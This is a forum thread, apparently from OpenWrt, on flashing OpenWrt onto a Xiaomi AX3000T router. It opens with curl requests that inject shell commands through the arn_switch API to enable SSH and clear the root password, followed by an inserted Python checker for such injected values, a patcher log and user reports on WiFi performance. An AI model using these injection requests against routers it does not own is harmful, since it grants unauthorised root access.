TOH: https://openwrt.org/inbox/toh/xiaomi/ax3000t

SSH access:

A vulnerability is exploited in function arn_switch , which is present only in firmware v1.0.47

1. Difficult method
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0Anvram%20commit%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=*******/api/misystem/arn_switch" -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A"
curl -X POST "http://192.168.31.1/cgi-bin/luci/;stok=********/api/misystem/arn_switch" -d "open=1&model=1&level=%0Apasswd%20-d%20root%0A"

2. Easy method
  • Download XMiR-Patcher and unpack into any directory
  • Execute !START.bat (or run.sh on *nix machine)
  • Execute 2
  • Download XMiR-Patcher and unpack into any directory
  • Copy UBInized image openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-initramfs-factory.ubi into directory firmware
  • Execute !START.bat (or run.sh on *nix machine)
  • Execute 2
  • Execute 7
  • Wait 40...70 seconds
  • Browse 192.168.1.1
  • Using LuCI flash sysupgrade image openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-squashfs-sysupgrade.bin
  • Wait 40...70 seconds
  • Revert to stock firmware:

  • Download facinstall package and install it
  • Using LuCI flash stock image
  • Instruction for RD23 (INT version):

    Xiaomi AX3000T RD23 (Global version): OpenWrt installation guide for installing OpenWrt on the Xiaomi AX3000T RD23 (Global Version). installation method: UART Flash. the following OpenWrt installation method requires opening the device, connecting a UART cable, and following a specific set of steps. warning This process is recommended only for advanced users, and may soft-brick your device. Please do not forget to make a backup of original router partitions before performing any actions …
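The arn_switch requests quoted above work because the `level` field is decoded and handed to a shell, so an encoded newline (`%0A`) ends the intended command and starts another. The following added example (my own code, not from this thread or from XMiR-Patcher) shows a defender-side check: it decodes form bodies the way the handler would, rejects a `level` that is not a plain integer, and lists the extra lines smuggled in. The request bodies are constructed samples; the first copies the shape of the first curl command above.

```python
from urllib.parse import parse_qs

# Constructed sample request bodies: the first mirrors the arn_switch
# request quoted above, the second is what a benign call looks like.
SAMPLE_BODIES = [
    "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A",
    "open=1&model=1&level=1",
]

# Characters that have no place in a numeric 'level' field and that let
# a caller break out of the command line the CGI handler builds.
SHELL_BREAKOUT = set("\n\r;|&`$")


def parse_body(body: str) -> dict:
    """Decode a form body into {field: value}; first value wins."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def injected_lines(value: str) -> list:
    """Return the extra lines hidden in a field via encoded newlines."""
    lines = [ln.strip() for ln in value.replace("\r", "\n").split("\n")]
    return [ln for ln in lines if ln]  # drop the empty padding lines


def is_suspicious(params: dict) -> bool:
    """Flag a request whose 'level' is not a plain integer (the hardened
    handler would apply exactly this allow-list and refuse the request)."""
    level = params.get("level", "")
    if level.isdigit():
        return False
    return any(ch in SHELL_BREAKOUT for ch in level)


def audit(bodies) -> list:
    """Run the check over captured bodies; return (body, smuggled lines)."""
    findings = []
    for body in bodies:
        params = parse_body(body)
        if is_suspicious(params):
            findings.append((body, injected_lines(params["level"])))
    return findings


if __name__ == "__main__":
    for body, lines in audit(SAMPLE_BODIES):
        print("suspicious body:", body)
        for ln in lines:
            print("  smuggled line:", ln)
```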

    I just followed the "Easy Method" to install OpenWrt, and unfortunately it bricked my device (orange led during power on, then it turns off and nothing else happens). See XMiR-Patcher output below.

    My device was configured as Access Point in the original firmware, I'm not sure if this could cause the issue. When I have time I will try to unbrick it and try again.

    ==========================================================
    Xiaomi MiR Patcher
     1 - Set IP-address (current value: 192.168.1.128)
     2 - Connect to device (install exploit)
     3 - Read full device info
     4 - Create full backup
     5 - Install EN/RU languages
     6 - Install Breed bootloader
     7 - Install firmware (from directory "firmware")
     8 - {{{ Other functions }}}
     9 - [[ Reboot device ]]
     0 - Exit
    Select: 2
    device_name = RD03
    rom_version = 1.0.47 release
    mac address = 7c:83:xx:xx:xx:xx
    Current CountryCode = CN
    Enter device WEB password: xxxxxxx
    Run SSH server on port 22 ...
    #### SSH server are activated! ####
    ==========================================================
    Xiaomi MiR Patcher
     1 - Set IP-address (current value: 192.168.1.128)
     2 - Connect to device (install exploit)
     3 - Read full device info
     4 - Create full backup
     5 - Install EN/RU languages
     6 - Install Breed bootloader
     7 - Install firmware (from directory "firmware")
     8 - {{{ Other functions }}}
     9 - [[ Reboot device ]]
     0 - Exit
    Select: 7
    device: "RD03"
    img_write = True
    Image files in directory "firmware/":
      "firmware/openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-stock-initramfs-factory.ubi"
    Download file: "/tmp/dmesg.log" ....
    Download file: "/tmp/mtd_list.txt" ....
    Download file: "/tmp/mtd_addr.txt" ....
    Download file: "/tmp/mtd_ro.txt" ....
    Download file: "/tmp/kcmdline.log" ....
    Parse all images...
    UBI: filetype: b'UBI#'
    UBI: Decoding UBIFS...
    UBI:   volume: "kernel"          size: 19173376
    parse_ubifs = 1
    FIT size = 0x123CA10 (18674 KiB)
    FIT: name = "ARM64 OpenWrt FIT (Flattened Image Tree)"
    FIT: def_cfg: "config-1"
    FIT: def_fdt: "fdt-1"
    FDT: desc = "ARM64 OpenWrt xiaomi_mi-router-ax3000t-stock device tree blob"
    FDT: type = "flat_dt"
    FDT: arch = "arm64"
    KRN: desc = "ARM64 OpenWrt Linux-5.15.137"
    KRN: type = "kernel"
    KRN: arch = "arm64"
    KRN: compression = "lzma"
    KRN: data = 3770699 bytes
    FDT: compatible = ['xiaomi,mi-router-ax3000t-stock', 'mediatek,mt7981']
    FDT: model = "Xiaomi Mi Router AX3000T (stock layout)"
    FDT: dt_part: ['/spi@1100a000/flash@0/partitions']
    FIT: Founded "initrd-1" node
    FIT: initrd image name: "ARM64 OpenWrt xiaomi_mi-router-ax3000t-stock initrd"
    fw_img: 20224 KiB | kernel: 18674 KiB | rootfs: 14968 KiB
    Download file: "/tmp/bl_BL2.bin" ....
    Download file: "/tmp/bl_FIP.bin" ....
    Download file: "/tmp/env_Nvram.bin" ....
    Download file: "/tmp/env_Bdata.bin" ....
    Download file: "/tmp/env_BL2.bin" ....
    current flag_boot_rootfs = 0
    install_method = 400
    --------- prepare command lines -----------
    fw_img: 20224 KiB | kernel: 18674 KiB | rootfs: 14968 KiB
    ------------- flash images -------------
    Upload file: "tmp/fw/fw_img.bin" ....
    Run scripts for change NVRAM params...
    Boot from firmware [1] activated.
    Writing firmware image to addr 0x02800000 ...
      mtd -e "ubi1" write "/tmp/fw_img.bin" "ubi1"
    The firmware has been successfully flashed!
    Send command "reboot" via SSH/Telnet ...
    ERROR: SSH execute command timed out! CMD: "reboot -f"
    ==========================================================
    Xiaomi MiR Patcher
     1 - Set IP-address (current value: 192.168.1.128)
     2 - Connect to device (install exploit)
     3 - Read full device info
     4 - Create full backup
     5 - Install EN/RU languages
     6 - Install Breed bootloader
     7 - Install firmware (from directory "firmware")
     8 - {{{ Other functions }}}
     9 - [[ Reboot device ]]
     0 - Exit
    Select:

    Update 1: my device was not really bricked, OpenWrt install was actually successful. Some notes here that may help others in the future:

  • It seems that the standard OpenWrt LED behavior is configured differently in remittor's build (I was expecting a quick orange blink then slow blink while OpenWrt loads, then steady blue when OpenWrt boot completes). So after OpenWrt boots with remittor's build, the AX3000T LED behavior is to go from solid orange to off (probably LED is reporting the WAN status, but I haven't tested to confirm this since I did not have a WAN connection during the flashing procedure).
  • This device does not have the WAN port clearly identified (I believe that the original firmware can use any port as WAN, but I'm not sure). The WAN port used by OpenWrt is the one close to the power connector. I was using this port after the initial OpenWrt flash, and for this reason I had no access to 192.168.1.1. I just connected the ethernet cable to another Ethernet port and everything worked as expected.
  • Update 2: just flashed the WR30U image and the AX3000T LED is now working fine (it is reporting system status, orange flashing quickly then slowly when OpenWrt boots, then steady blue when OpenWrt boot completes).

    dsouza:

    then steady blue when OpenWrt boot completes). So after OpenWrt boots with remittor's build, the AX3000T LED behavior is to go from solid orange to off

    I fixed this now.

    FWIW I firstly flashed ubootmod build from Dimfish and since I wanted to use builds from eko.one.pl, I flashed WR30U image and everything seems to be working fine - except for NFC, which I don't use.

    At one point I made a mistake and feared I bricked my router (with i_want_a_brick) - it powered on with a blue light, responded to ping on 192.168.1.1 but with no open ports. It turned out that this is a recovery mode and it looks for a TFTP server at 192.168.1.254.

    Does it matter where I buy this router from when it comes to channel availability/restrictions?

    Since routers for the Chinese market usually do not support 5GHz channels between 96 - 144, for Mediatek based platforms like this Xiaomi is it hardware limited in the SOC or is it only software limited and can these channels be used in OpenWrt?

    Just flashed the latest build from Remittor using XMiR-Patcher. The instructions worked first try, my AX3000T was on stock firmware 1.0.47 from the factory.

    Looking good so far, I did a quick iperf3 test:
    Server: Laptop, wired connection (1Gbit) direct to router.
    Client: iPhone 12 connected to 5 GHz network from router @ 1 meter distance.

    Both tests are on 5 GHz channel 149.

    I also got good Wifi speeds (802.11ax@80MHz) close to the AX3000T (line of sight, same room).

    However when testing WiFi speed in another room with a brick wall between the device (iPhone 13 Pro) and the AX3000T, Wifi speeds were really bad. If possible, could you please test AX3000T WiFi speeds in another room, especially upload speeds?

    I am wondering whether this device is suffering the same issue as the Redmi AX6S/Xiaomi AX3200/Belkin RT2000, which was only solved after disabling 160MHz support from the build - details below:

    [Solved] 802.11ax worse than 802.11ac with mt76 driver? Network and Wireless Configuration I just upgraded one of my access points from an Archer C6 v3.2 to a Redmi AX6S. Since the new device has support to 802.11ax on the 5Ghz band, I've decided to do some tests. While in the same room 802.11ax has a higher throughput than 802.11ac (tested with iPerf3 on a wired Linux machine and an iPhone 13Pro), the performance of 802.11ax in another room across one brick wall is much worse than 802.11ac (see results below). I had the assumption that 802.11ax would always have a superior perfor…

    When I have time I will do additional tests with the AX3000T and apply the workarounds in the above thread to see if it improves the Wifi speeds in this situation.

    Sure, if I don't forget I will try more tests one of these days and report back.

    I was playing around with 80 and 160 MHz on different channels and noticed something interesting.
    When I select 160 MHz and set the channel to 149 or higher the wireless overview shows the corresponding frequency somewhere in the 6 GHz band (channel 165 as 6.775 GHz, suggesting WiFi 6E?!). My WiFi 5/6 devices can't see the network at all anymore, unfortunately I can't tell if it's actually transmitting at 6 GHz as I don't have any 6E devices yet.
    So far I found one post mentioning this on a different MTK chipset, but it seems the other way round than what I see: